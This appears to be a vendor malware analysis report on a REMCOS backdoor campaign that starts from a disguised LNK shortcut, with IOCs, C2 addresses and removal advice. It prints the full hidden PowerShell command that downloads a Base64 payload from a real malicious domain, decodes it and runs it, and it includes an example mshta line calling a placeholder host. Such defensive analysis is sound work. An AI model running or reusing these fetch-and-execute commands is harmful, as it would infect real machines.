Introduction

A malicious LNK (Windows Shortcut) file attack is a common and stealthy technique used by cybercriminals to deliver malware by exploiting the functionality of Windows shortcut files.

A common way hackers carry out fileless attacks is by using malicious Windows Shortcut (LNK) files. These shortcuts are disguised to look harmless, like a document, folder, or disk drive. When a user clicks on them, instead of opening a normal file, they secretly run a command. This command often uses trusted system tools (like PowerShell) to download and run harmful code directly in the computer’s memory, without saving any files to the disk. The malicious script or program is fetched from a remote server, making it harder to detect.

This report details a multi-stage malware campaign delivering the REMCOS backdoor via a malicious Windows LNK shortcut file. The attack begins with social engineering, leverages PowerShell for initial execution and deploys a persistent backdoor capable of full system compromise. The infection chain involves file download, Base64 decoding and execution of a malicious PIF file masquerading as a harmless Chrome-related program.

How the Attack Typically Works:

1. Delivery: 

  • Phishing Emails: The most common vector. The LNK file is attached directly or hidden inside a ZIP/RAR archive. The email urges the victim to open the “document”, “invoice” or “word.” 
  • Malicious Websites/Downloads: Users might be tricked into downloading what appears to be a legitimate file but is actually an LNK file.
  • Network Shares: Placing malicious LNK files on accessible network drives.

2. The Malicious LNK File: 

  • Disguise: The LNK file is given an icon and filename mimicking a legitimate document (e.g., Invoice.pdf.lnk, word.docx.lnk) a folder or even an executable. Windows often hides known file extensions by default, so the user only sees Invoice.pdf.
  • Malicious Command: Instead of pointing to a legitimate application or document, the LNK file’s “Target” field contains a malicious command. Common commands include:
  1. cmd.exe /c … (Execute Command Prompt commands)
  2. powershell.exe -Command … (Execute PowerShell commands – highly favoured)
  3. mshta.exe http://malicious.site/payload.hta (Execute malicious HTA script)
  4. rundll32.exe … (Execute malicious DLL functions)
  •  Exploiting LNK Properties: Attackers can abuse other LNK properties:
  1. Icon Location: The path to the icon file can be crafted to point to a malicious DLL or executable, triggering code             execution when Windows tries to load the icon.
  2. Alternate Data Streams (ADS): Malicious scripts or payloads can be hidden within ADS associated with the LNK  file.

3. Execution (User Interaction):

  • The victim double-clicks the disguised LNK file, believing it to be a safe document or program.
  • No Macro Warning Needed: Unlike malicious Office documents, LNK files don’t trigger macro security warnings. Execution happens silently.

4. Payload Execution:

  • Windows executes the command embedded within the LNK file (e.g., launches PowerShell).
  • This command typically:
    •  Downloads malware from the internet and executes it.
    •  Executes a malicious script directly (PowerShell, HTA, VBScript, JScript).
    •  Executes code hidden within the LNK file itself (via icon path or ADS).
  • The malware gains persistence and performs its malicious activities.

File Information

File Name : ORDINE-DI-ACQUIST-7263535

Hash Values :

  • MD5       : ae8066bd5a66ce22f6a91bd935d4eee6
  • SHA1   : d2f97077fcf7e340a4262fa944ab13f133aa4e58
  • SHA256 : 506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6
  • File type: Windows shortcut (lnk)
Figure 1: How LNK File look to a normal user

Infection Workflow:

Figure 2: Infection Workflow image

Static Analysis of Lnk File:

As below Figure 3 the target part reveals that LNK invokes the Windows PowerShell Processor (powershell.exe).

Figure 3: LNK File target path

Target file path location –

“C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe”

Figure 4: Target File path location

The target path as seen in the properties is only visible to some characters. However, command-line arguments can be very large, so malicious actors can get this advantage and pass on long arguments as they will be not visible in the properties.

In our case the argument is:

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe E -WindowStyle hidden -Command (new-object System.Net.WebClient).DownloadFile('https://shipping-hr.ro/m/r/r.txt','C:\\ProgramData\\HEW.GIF'); $file = 'C:\\ProgramData\\HEW.GIF'; [System.Convert]::FromBase64String((Get-Content $file)) | Set-Content C:\\ProgramData\\CHROME.PIF -Encoding Byte; start C:\\ProgramData\\CHROME.PIF
Figure 5: Content of LNK file (Argument/command)

Technical Analysis/File Behaviour 

Powershell command:

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -Command

((new-object System.Net.WebClient).DownloadFile('https://shipping-hr.ro/m/r/r.txt','C:\\ProgramData\\HEW.GIF');
$file = 'C:\\ProgramData\\HEW.GIF';
[System.Convert]::FromBase64String((Get-Content $file)) | Set-Content C:\\ProgramData\\CHROME.PIF -Encoding Byte;
start C:\\ProgramData\\CHROME.PIF)

Powershell Command breakdown analysis:

Stage 1: File Download

(new-object System.Net.WebClient).DownloadFile('https://shipping-hr.ro/m/r/r.txt','C:\\ProgramData\\HEW.GIF');

Domain – shipping-hr.ro/m/r/r.txt

Destination – C:\ProgramData\HEW.GIF

System.Net.WebClient downloads a local file from a remote server using this domain and then uses Windows system directory ProgramData (hidden by default) to save this file.

Figure 6: URL containing encoded binary text
Figure 7: Downloaded HEW.GIF File

Stage 2: Base64 Decoding 

$file = 'C:\\ProgramData\\HEW.GIF';
[System.Convert]::FromBase64String((Get-Content $file)) | Set-Content C:\\ProgramData\\CHROME.PIF -Encoding Byte;

Reads the “HEW.GIF” file (which is not an image but a Base64-encoded string).

[System.Convert]::FromBase64String():

Decodes the Base64 content into raw bytes.

Set-Content -Encoding Byte:

Writes the decoded bytes to C:\ProgramData\CHROME.PIF as a binary file.

Figure 8: CHROME.PIF (Binary File)

Stage 3: Payload Execution

start C:\\ProgramData\\CHROME.PIF

start command: Launches the malicious CHROME.PIF file.

It is a MS-DOS Program which is executable files. A PIF file acts like a shortcut, providing Windows with instructions on how to run a specific program, especially DOS programs.

PIF File Risks:

Due to extension hiding in newer Windows versions, users might not be aware of the risks associated with PIF files and may inadvertently run them.

PIF files can be used in phishing attacks where users are tricked into running a malicious PIF file.

Process Monitoring:

In the below image, we can see how the process has been executed. First targeting the PowerShell file then executing the CHROME.PIF (payload) file & colorcpl.exe file.

Dropped file Info:

C:\ProgramData\HEW.GIF

C:\ProgramData\CHROME.PIF (Payload File)

C:\ProgramData\Xufewgoz.url

C:\ProgramData\[.].cmd (batch file)

Figure 9: Dropped File

Add Shortcut for another file to run the source file:

Adding a shortcut to the Xufewgoz.url file which is our earlier MS-DOS Program File (CHROME.PIF).

Figure 10: Xufewgoz.url File

In below image, the location of this file is C:\Users\Admin\Links\Xufewgoz.PIF

Now Below we analyze the CHROME.PIF file, which is the payload file of that program.  

Payload File Info

Overview:

REMCOS is a backdoor written in C++ that communicates using a custom binary protocol over TCP. Supported backdoor commands include mouse and keyboard manipulation, arbitrary shell command execution, file transfer, and file execution. REMCOS can also capture webcam video, microphone audio, keystrokes, and screenshots.

File Information

File Name : CHROME.PIF

Hash Values :

  • MD5       : 560682cdcf395b5eb95487c7ef65c63e
  • SHA1   : e444d001f2b69259f7845a5ffe9a44113d90e382
  • SHA256 : 5ec8268a5995a1fac3530acafe4a10eab73c08b03cabb5d76154a7d693085cc2

Technical Analysis/File Behaviour 

Figure 11: PE Image based File (MS-DOS)

During Static analysis, it revealed that this is a PE image-based File (MS-DOS Program).

System call function:

The keyboard recorder uses user32.dll to create the SetWindowsHookExA function, the recorder injects a hook procedure into the keyboard message-handling chain. This hook captures keyboard events, records inputs, and initiates supplementary actions such as screenshots.

Figure 12: Uses SetWindowsHookExA() API

Mutex Creation:

Figure 13: Mutex Creation

Creating Keylogger log:

A log file is stored in the %ProgramData% directory, where a folder named “remcos” is created. Inside this folder, a file called logs.dat is generated to capture and store all system logging activities and keystrokes.

Figure 14-A: logs.dat file

In the below image, the keystroke has been captured-

Figure 14-B: logs.dat file

Network communication (C2):

Figure 15: C2 Network image

In the above image, the IP address “92.82.184.33” is located in Romania. It is associated with the network AS9050, which is Telekom Romania Communication S.A. The domain “shipping-hr.ro” has resolved to this IP address with encryption by the TLSv1.2 protocol.

Also, the other IP- 198.23.251.10 which is located in the United States, has also connected.

Removal:

Reboot into Safe Mode with Networking

Use UltraAV antivirus

Manually Check:

  • Task Scheduler
  • Registry run entries
  • Startup folders
  • Delete suspicious files like CHROME.PIF, unknown temp EXEs

Detected as following name by UltraAV

  • Trojan.WinLNK.Powershell_S03
Figure 16: Threat Detection with AV

Prevention Tips

  • Use updated antivirus and enable real-time protection
  • Avoid downloading pirated software or cracks
  • Don’t click on suspicious links or attachments
  • Monitor system performance regularly (Task Manager)

Indicators of compromise

SHA256 & File name:

FileSHA-256
ORDINE-DI-ACQUIST-7263535506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6
CHROME.PIF5ec8268a5995a1fac3530acafe4a10eab73c08b03cabb5d76154a7d693085cc2
HEW.GIF8bc668fd08aecd53747de6ea83ccc439bdf21b6d9edf2acafd7df1a45837a4e1

DNS Resolution:

UrlIP
shipping-hr.ro92.82.184.33
mal289re1.es198.23.251.10

File Artifact:

File Path%ProgramData%\remcos\logs.dat

Conclusion

Malicious LNK shortcut files remain a serious threat because they’re easy to create, hard to detect, and trick users into running harmful commands. Since these attacks keep evolving, users should always be cautious with shortcut files, especially from emails or untrusted sources. Always double-check before opening attachments or clicking links to avoid infection.